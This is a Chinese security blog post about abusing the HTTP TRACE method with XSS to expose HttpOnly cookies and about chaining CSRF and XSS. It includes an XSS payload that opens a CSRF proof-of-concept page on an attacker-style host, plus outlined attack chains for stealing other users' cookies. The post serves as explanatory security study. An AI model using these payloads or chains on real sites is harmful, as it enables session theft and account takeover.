trace方法的利用,以及CSRF+XSS的一些思路

最新推荐文章于 2024-06-08 08:02:26 发布
最新推荐文章于 2024-06-08 08:02:26 发布
阅读量1.2k 收藏 6
点赞数 2
文章标签: 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51681694/article/details/130452528
版权

一.定义

    一个请求从客户端到服务端,中间可能会经历各种代理、网关等程序,每个中间节点都可能修改原始HTTP请求。为此,通过TRACE,服务端会在接收到请求后反馈一个TRACE响应,并且在响应主体中携带它收到的原始请求报文。客户端拿到TRACE响应,就可以进行测试和诊断了   

   HTTP/1.1(RFC2616)规范定义了 HTTP TRACE 方法,主要是用于客户端通过向 Web 服务器提交 TRACE 请求来进行测试或获得诊断信息。当 Web 服务器启用 TRACE 时,提交的请求头会在服务器响应的内容(Body)中完整的返回,其中 HTTP 头很可能包括 Session Token、Cookies 或其它认证信息。

如:

 二.利用

一般是配合其他漏洞进行攻击

比如http trace请求而可用js或者其他客户端脚本发起请求(XMLHttpRequest),配合xss漏洞或者其他漏洞进行攻击(绕过httponly?)

以下是一个简单的示例

首先抓包修改方法以及任意在请求头中插入恶意语句

 然后抓返回包修改content-type,把返回格式改为html格式

 放包后弹窗

 参考链接:trace方法引起的xss漏洞-CSDN博客

https://www.cnblogs.com/xiaodangshan/p/7715313.html

三.辅记

写着写着忽然联想到了CSRF跟XSS的组合拳

我觉得主要有以下几种情况

第一原则肯定是能获权限就尽量获取

(1)XSS衍生CSRF

一种情况是cookie设置了httponly属性,xss偷不到完整cookie,意味着获取不到权限,但是仍然可以在xss处插入其他恶意脚本,简单一个就是CSRF的Poc,如

<script src="x" onerror=javascript:window.open("http://192.168.1.4/csrf.html")></script>

 这样可以减少CSRF的攻击难度,普通的CSRF数据在post里面,还要钓鱼啥的......

 (2)CSRF衍生XSS

如果某个点的XSS只有自己能看见,比如说比较私密的个人信息设置,管理员以及其他用户无法访问,也就是说其他人无法触发恶意脚本

要是这个点也有CSRF漏洞,那么你懂的,CSRF钓鱼,进一步将其他人的XSS点插入恶意语句,这样就可以偷cookie了

(3)链

如果A站出现了一个可以任意人访问的XSS,但是有httponly加持,或者是这个站没权限,B站有一个只有自己可以访问的XSS以及CSRF点

那么你懂的,A站插入像(1)一般的恶意语句,只是恶意语句里面的攻击对象是B站,之后CSRF Poc在B站中向其他人插入XSS语句,这样就能实现链式攻击 

什么时候写一下上面的几个组合拳方法实战......

rneck
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
asp.net校园新闻发布系统的设计与实现(源代码+论文).rar
02-05
8. **论文部分**:这部分可能详细探讨了系统的设计思路、技术选型、架构设计、性能优化等方面,展示了开发者对软件工程的理解和实践。 通过这个项目,学习者不仅可以掌握ASP.NET的基本语法和控件使用,还能了解到...
一份关于windows server服务器的安全漏洞处理建议(来自绿盟安全评估)_允许traceroute探测漏洞(1)
2401_84545291的博客
05-13 1225
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【转载】TRACE请求引起的反射型XSS漏洞
SunnyCat
06-18 807
原文链接:https://www.cnblogs.com/gaopei/p/11380349.html TRACE请求引起的反射型XSS漏洞 HTTP定义了一组请求方法,以表明要对给定资源执行的操作。指示针对给定资源要执行的期望动作。 虽然他们也可以是名词, 但这些请求方法有时被称为HTTP动词. 每一个请求方法都实现了不同的语义。其中,TRACE方法沿着到目标资源的路径执行一个消息环回测试。 关于TRACE方法 客户端发起一个请求时,这个请求可能要穿过防火墙、代理、网关或其他一些应用程序。每个中间节点都可
apache 关闭TRACE请求,禁止跨站攻击(XSS攻击)
最新发布
qq_25096749的博客
06-08 445
详细介绍XST攻击 http://blog.sina.com.cn/s/blog_6f7ce4a40100nx9g.html。注意:apache 配置跨站攻击后无法再配置别名,否则会被当作跨站攻击来处理。2、apache禁止trace或track防止xss攻击。1、什么事XSS攻击。
深入探讨TRACE请求:解析、用途和安全性分析
博客
08-08 3355
TRACE请求是一种用于回显服务器收到的请求的HTTP方法。当客户端发送TRACE请求时,服务器将原始请求报文作为响应返回给客户端,用于检查或调试请求的传输过程。调试:通过回显请求报文,开发人员可以查看请求在传输过程中是否被修改,以及服务器对请求的处理过程。诊断:TRACE请求可以用于诊断网络问题,例如检查请求是否被正确地转发到目标服务器。测试:开发人员可以利用TRACE请求测试API的可用性和正确性。TRACE请求作为一种特殊的HTTP请求方法,在Web开发中具有重要的作用。
HTTP的8种请求方式及常用请求方式的解析
热门推荐
weixin_48520816的博客
06-14 6万+
HTTP,即超文本传输协议,是一种实现客户端和服务器之间通信的响应协议,它是用作客户端和服务器之间的请求。客户端(浏览器)会向服务器提交HTTP请求;然后服务器向客户端返回响应;其中响应包含有关请求的状态信息,还可能包含请求的内容。HTTP/1.1协议中共定义了八种方法(有时也叫“动作”),来表明Request-URL指定的资源不同的操作方式 其中: HTTP1.0定义了三种请求方法: GET, POST 和 HEAD方法。 HTTP1.1新增了五种请求方法:OPTIONS, PUT, DELETE, TR
web漏洞-远端WWW服务支持TRACE请求
qq_35578446的博客
06-13 1万+
远端WWW服务支持TRACE请求。RFC 2616介绍了TRACE请求,该请求典型地用于测试HTTP协议实现。
trace方法引起的xss漏洞
haoaaao的博客
04-27 1853
HTTP定义了一组请求方法,以表明要对给定资源执行的操作。指示针对给定资源要执行的期望动作。 虽然他们也可以是名词, 但这些请求方法有时被称为HTTP动词. 每一个请求方法都实现了不同的语义。其中,TRACE方法沿着到目标资源的路径执行一个消息环回测试。 关于TRACE方法 客户端发起一个请求时,这个请求可能要穿过防火墙、代理、网关或其他一些应用程序。每个中间节点都可能会修改原始的 HTTP 请求。TRACE 方法允许客户端在 最终将请求发送给服务器时,看看它变成了什么样子。 TRACE 请求会在目的
TRACE请求造成XSS
qq_50854662的博客
07-03 546
TRACE请求造成XSS
Web应用安全:HTTP协议GET和POST的使用区别文本.docx
06-17
POST请求的安全性相对更高,因为它不将数据暴露在URL中,但仍然需要注意防止跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等安全问题。 在Web应用安全方面,理解GET和POST的使用差异至关重要,因为它们直接关系到数据...
005-Web安全基础1 - HTTP协议.pptx
10-22
例如,GET请求的可见性可能导致跨站脚本攻击(XSS)和跨站请求伪造(CSRF),而POST请求的安全性更高但仍然需要防御SQL注入和其他类型的数据篡改攻击。了解这些基础知识有助于开发安全的应用程序并保护用户数据。
加载loader (How to Load External Images in Actionscript 3.0)
03-18
8. **安全提示**:加载外部内容时,要注意防止XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等安全问题。确保只从可信来源加载内容,并对用户输入进行验证。 以上就是ActionScript 3.0中如何加载外部图片的基本步骤和...
允许trace方法_Go: Trace包探秘
weixin_39845347的博客
12-03 454
本文基于Go 1.13。Go为我们提供了一个工具,可在运行时启用跟踪并获得程序执行的详细视图。借助trace软件包,可以通过测试的标识-trace启用此工具,从pprof进行实时跟踪,或者在我们的代码中的任何地方启用此工具。该工具功可以更强大,因为你可以使用自定义traces对其进行增强。让我们回顾一下它的工作原理。流程该工具的流程非常简单。每个事件,例如内存分配;垃圾收集器的所有阶段;Go标准库...
常见HTTP请求方式
weixin_62626298的博客
10-26 675
http的请求方式介绍
“远端www服务支持TRACE请求“漏洞
juan_php_user的博客
09-26 1424
采用拦截器来过滤所有的trace请求->启动类增加配置来实现,或者和内嵌式tomcat一样直接添加Jetty配置类来实现也可以。在服务器漏扫中经常遇到"远端www服务支持TRACE请求"漏洞,绿盟扫描器所提供修复建议有不适用的情况。对已经处理过的不同应用禁用TRACE请求做一总结记录。注:在tomcat的在server.xml中先允许TRACE请求,再在web.xml中禁用TRACE,以此禁用TRACE请求.注:可以在httpd.conf里搜索VirtualHost确定虚拟主机的配置文件。
远程WWW服务支持TRACE请求漏洞
huangbaokang的博客
04-30 3250
漏洞详细描述: 远端WWW服务支持TRACE请求。RFC 2616介绍了TRACE请求,该请求典型地用于测试HTTP协议实现。攻击者利用TRACE请求,结合其它浏览器端漏洞,有可能进行跨站脚本攻击,获取敏感信息,比如cookie中的认证信息,这些敏感信息将被用于其它类型的攻击。 解决办法 1、停止Apache服务(以root权限登录) # cd /opt/IBM/H...
解决远端www服务支持TRACE请求的几种方式
qq_44691484的博客
05-31 8639
trace问题
tp5 tracetrace信息调试,异步请求开启trace信息,thinkphp5
weixin_41750729的博客
05-11 973
在 tp5 框架中,提供 trace调试信息的输出,用于帮助开发进行调试的辅助工具,trace信息的展示,框架支持两种形式的展示,一个是提供Html页面展示,一个是提供Console控制台输出展示。 但是重点来了,我不管用哪种形式,对于页面ajax请求后端接口的调用,两种形式都不进行展示,狠是不方便,对此,进行了一番研究,目的是要实现每次进行ajax请求时,都可以在控制台中看到此次请求的 trace信息。1、在 \application\config.php 中将 ‘app_trace’ 选项配置为 tr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值